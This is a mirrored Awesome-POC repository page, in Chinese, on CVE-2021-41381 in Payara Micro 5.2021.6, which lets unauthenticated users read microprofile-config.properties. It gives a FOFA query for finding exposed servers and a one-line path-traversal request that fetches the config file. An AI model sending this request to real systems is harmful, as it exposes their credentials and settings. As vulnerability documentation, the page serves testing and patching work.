admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web服务器漏洞/PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

536 B
Raw Blame History

PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381

漏洞描述

PayaraMicro microprofile-config.properties文件配置错误的情况下可被任意用户读取获取敏感信息

漏洞影响

Payara Micro Community 5.2021.6

FOFA

app="Payara-Micro"

漏洞复现

产品页面

image-20220525163706617

验证POC

/.//WEB-INF/classes/META-INF/microprofile-config.properties

image-20220525163715004